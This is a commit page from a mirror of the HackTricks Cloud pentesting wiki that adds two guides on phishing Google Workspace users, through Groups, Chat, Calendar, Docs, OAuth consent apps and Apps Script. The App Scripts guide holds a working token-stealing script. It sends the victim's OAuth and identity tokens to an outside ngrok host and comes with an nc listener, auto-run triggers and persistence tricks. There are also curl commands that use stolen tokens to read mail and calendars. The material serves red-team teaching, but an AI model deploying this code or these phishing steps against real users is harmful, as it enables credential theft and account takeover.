gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-10 12:13:17 -08:00
Code Issues Packages Projects Releases Wiki Activity

Migrate to using mdbook

Browse Source
This commit is contained in:
Congon4tor
2024-12-31 17:04:35 +01:00
parent b9a9fed802
commit cd27cf5a2e
1373 changed files with 26143 additions and 34152 deletions
Download Patch File Download Diff File Expand all files Collapse all files

165
src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md Normal file
View File

@@ -0,0 +1,165 @@
# GWS - Google Platforms Phishing
{{#include ../../../banners/hacktricks-training.md}}
## Generic Phishing Methodology
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology
{{#endref}}
## Google Groups Phishing
Apparently, by default, in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will look **legit** and people might click on the link.
It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
<figure><img src="../../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
## Google Chat Phishing
You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
<figure><img src="../../../images/image (6).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> **In my testing however the invited members didn't even receive an invitation.**
You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
## Google Doc Phishing
In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
<figure><img src="../../../images/image (7).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
## Google Calendar Phishing
You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event look legit and **put a comment and a title indicating that they need to read something** (with the **phishing link**).
This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
<figure><img src="../../../images/image (8).png" alt=""><figcaption></figcaption></figure>
To make it look less suspicious:
- Set it up so that **receivers cannot see the other people invited**
- Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
- Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
## App Scripts Redirect Phishing
It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**.\
The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
```javascript
function doGet() {
return HtmlService.createHtmlOutput(
'<meta http-equiv="refresh" content="0;url=https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing#app-scripts-redirect-phishing">'
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
}
```
For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
<figure><img src="../../../images/image (4) (1).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Note that a warning will appear as the content is loaded inside an iframe.
## App Scripts OAuth Phishing
It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
{{#ref}}
gws-app-scripts.md
{{#endref}}
## OAuth Apps Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
> [!NOTE]
> Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
When creating an application to **act on behalf other users**, the developer needs to create an **OAuth app inside GCP** and indicate the scopes (permissions) the app needs to access the users data.\
When a **user** wants to **use** that **application**, they will be **prompted** to **accept** that the application will have access to their data specified in the scopes.
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. However, in organizations accounts, there are ways to prevent this from happening.
### Unverified App prompt
As it was mentioned, google will always present a **prompt to the user to accept** the permissions they are giving the application on their behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making it more difficult** for the user to grant the permissions to the app.
This prompt appears in apps that:
- Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
- Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
### Interesting Scopes
[**Here**](https://developers.google.com/identity/protocols/oauth2/scopes) you can find a list of all the Google OAuth scopes.
- **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
- **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
### Create an OAuth App
**Start creating an OAuth Client ID**
1. Go to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) and click on configure the consent screen.
2. Then, you will be asked if the **user type** is **internal** (only for people in your org) or **external**. Select the one that suits your needs
- Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
3. Give a **name** to the app, a **support email** (note that you can set a googlegroup email to try to anonymize yourself a bit more), a **logo**, **authorized domains** and another **email** for **updates**.
4. **Select** the **OAuth scopes**.
- This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
- Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
5. **Add the test users.** As long as the status of the app is testing, only these users are going to be able to access the app so make sure to **add the email you are going to be phishing**.
Now let's get **credentials for a web application** using the **previously created OAuth Client ID**:
1. Go back to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), a different option will appear this time.
2. Select to **create credentials for a Web application**
3. Set needed **Javascript origins** and **redirect URIs**
- You can set in both something like **`http://localhost:8000/callback`** for testing
4. Get your application **credentials**
Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
```bash
git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
cd gcp_oauth_phishing_example
pip install flask requests google-auth-oauthlib
python3 app.py --client-id "<client_id>" --client-secret "<client_secret>"
```
Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
<figure><img src="../../../images/image (333).png" alt=""><figcaption></figcaption></figure>
The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
{{#ref}}
../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md
{{#endref}}
#### Using `glcoud`
It's possible to do something using gcloud instead of the web console, check:
{{#ref}}
../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
{{#endref}}
## References
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
{{#include ../../../banners/hacktricks-training.md}}

235
src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md Normal file
View File

@@ -0,0 +1,235 @@
# GWS - App Scripts
{{#include ../../../banners/hacktricks-training.md}}
## App Scripts
App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
### Create App Script
There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
<details>
<summary>Create a container-bound project from Google Docs, Sheets, or Slides</summary>
1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
2. Click **Extensions** > **Google Apps Script**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
</details>
<details>
<summary>Create a standalone project</summary>
To create a standalone project from Apps Script:
1. Go to [`script.google.com`](https://script.google.com/).
2. Click add **New Project**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
</details>
<details>
<summary>Create a standalone project from Google Drive</summary>
1. Open [Google Drive](https://drive.google.com/).
2. Click **New** > **More** > **Google Apps Script**.
</details>
<details>
<summary>Create a container-bound project from Google Forms</summary>
1. Open a form in Google Forms.
2. Click More more_vert > **Script editor**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
</details>
<details>
<summary>Create a standalone project using the clasp command line tool</summary>
`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
</details>
## App Script Scenario <a href="#create-using-clasp" id="create-using-clasp"></a>
### Create Google Sheet with App Script
Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
### Leak token
In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
- **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
- **Gmail**: To access gmail data
- **Drive**: To access drive data
- **Google Sheets API**: So it works with the trigger
To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.**
```javascript
function getToken() {
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()
// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}
// Send data
makePostRequest(data)
// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})
// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)
// To ask for drive permissions
var files = DriveApp.getFiles()
}
function makePostRequest(data) {
var url = "http://5.tcp.eu.ngrok.io:12027"
var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}
try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
}
```
To capture the request you can just run:
```bash
ngrok tcp 4444
nc -lv 4444 #macOS
```
Permissions requested to execute the App Script:
<figure><img src="../../../images/image (334).png" alt=""><figcaption></figcaption></figure>
> [!WARNING]
> As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
### Create Trigger
Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
### Sharing
In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
> [!TIP]
> The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users.
### Abusing Shared With Me documents
> [!CAUTION]
> If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
>
> A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
> [!TIP]
> If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
### Copying instead of sharing
When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
<figure><img src="../../../images/image (335).png" alt=""><figcaption></figcaption></figure>
If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
### Sharing as Web Application
Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
<figure><img src="../../../images/image (337).png" alt=""><figcaption></figcaption></figure>
Followed by the **typical OAuth prompt asking** for the needed permissions.
### Testing
You can test a gathered token to list emails with:
```bash
curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"
```
List calendar of the user:
```bash
curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"
```
## App Script as Persistence
One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.**
It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
<figure><img src="../../../images/image (336).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> This will create a security alert email and a push message to your mobile alerting about this.
### Shared Document Unverified Prompt Bypass
Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
> [!WARNING]
> This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
>
> This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
> [!CAUTION]
> This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
> To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags).
{{#include ../../../banners/hacktricks-training.md}}